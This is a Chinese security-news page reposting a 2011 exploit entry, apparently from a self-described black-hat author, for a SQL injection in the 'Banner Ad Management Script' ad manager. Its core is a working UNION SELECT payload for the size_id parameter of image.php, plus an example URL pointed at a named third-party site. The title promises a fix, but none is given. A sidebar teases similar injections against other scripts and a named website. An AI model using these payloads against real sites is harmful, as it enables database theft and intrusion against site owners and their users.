Banner Ad Management Script SQL注入漏洞及修复

 
Banner Ad Management Script 是一款网站横幅广告管理系统,Banner Ad Management Script存在SQL注入漏洞,可能导致敏感信息泄露。

[+]info:
~~~~~~~~~
[~] Exploit Title : Banner Ad Management Script [ Sql Injection Vulnerability]
[~] Author : Egyptian.H4x0rz
[~] Contact : SpY(at)Hotmail.Com
[~] Date : 02-04-2011
[~] Software Link: http://www.softbizscripts.com/banner-ads-management-script-features.php
[~] category: Web Apps [SQli]
[~] HomePage : Black-hat.cc

[+]poc:
~~~~~~~~~
*SQL injection Vulnerability*
[#] http://patch/image.php?size_id=-1+union+select+1,[sqli],3,4,5,6,7,8,9,10,11
[#] eXample
http://bbs.honkwin.com//ad-manager/image.php?size_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11

 

更多相关文章
  •    IrIran Shoping是一款在线电子商务系统,IrIran Shoping中的page.php存在SQL注入漏洞,可能导致敏感信息泄露. [+]info:~~~~~~~~~ [~] Title     : IrIran Shoping Script SQL Injection Vulne ...
  • Readmore Systems Script是一款新闻类脚本系统, Readmore Systems Script中的news.php文件存在SQL注入漏洞,可能导致敏感信息泄露. [+]info:~~~~~~~~~ # Exploit Title: [Sql injextion]# Google ...
  • m1905分站sql注入漏洞及修复
    m1905分站sql注入漏洞,可获取管理员密码及进行拖库. m1905分站:http://piao.m1905.com/list.php?pid=39   由于对pid的过滤不严格导致get型的sql注入漏洞.     修复方案: 过滤 作者 Adra1n
  •   DVD Rental Software是一款电子商务软件,DVD Rental Software中的index.php存在SQL注入漏洞,可能导致敏感信息泄露.[+]info:~~~~~~~~~# Exploit Title: DVD Rental Software SQL injection ...
  • vBulletin是一款著名的商业论坛程序,vBulletin 3.8.x中的EggAvatar插件存在SQL注入漏洞,可能导致敏感信息泄露. [+]info:~~~~~~~~~EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability [+] ...
一周排行
  • bzoj1179
    其实是最大团问题,但是直接dfs不保证不tle 题解再次来自lsj(懒得敲): 对于一个强 ...
  • Shadowsocks是一个轻量级隧道Socks5代理,可加密网络通道. 1.下载nodejs 首先要进入https://nodejs.org/,点击页面上的INSTALL安装相对应的node环境. 2.安装node ...
  • 日前,AMD总裁邓元鋆在参加云博会时,向来访的媒体透露了AMD在云计算方面的相关策略及计划:邓元鋆表示,未来AMD将以用户最为关心的Consumerization(消费导向).Cloud(云计算).Convergen ...
  • Cocos2dhtml5游戏引擎学习笔记(2)Hello Cocos2dHtml5
    上一篇写到搭建开发环境,这篇当然就是传统的Hello World了. 首先在webstor ...
  • 在用hadoop的时候,启动失败,再次启动时出现there are stopped jobs ,解决如下:     1.查询当前的jobs:   $ jobs  $ jobs 2.结束jobs:   $ kill % ...
  • Android数据库操作辅助类:SQLiteOpenHelper
    1.MyDatabaseHelper.java代码如下: package org.lxh. ...
  • Html的未来发展方向就是标记 前端大牛司徒正美说过,Html的未来发展方向就是标记.关于这一点量子本人大部分同意,Html本来就是声明式的标记语言,通过扩展标记,就可以产生声明式编程的效果.以解决一些普遍性的问题. ...
  • C++入门:       <C++ Primer>(有侯捷繁体版和潘爱民简体第三版)       <C++编程思想>,也可以是<Esstion C++><Think in C ...
  •                                        第一章  前引                 滚滚长江东逝水 浪花淘尽英雄 是非成败转头空 青山依旧在 几度夕阳红 白发渔樵江渚上 惯看 ...
  • 足球世界杯小组赛(加强版) Time Limit:1000MS  Memory Limit:65536K Total Submit:59 Accepted:14 Description 世界杯小组赛的规则是胜一场则得 ...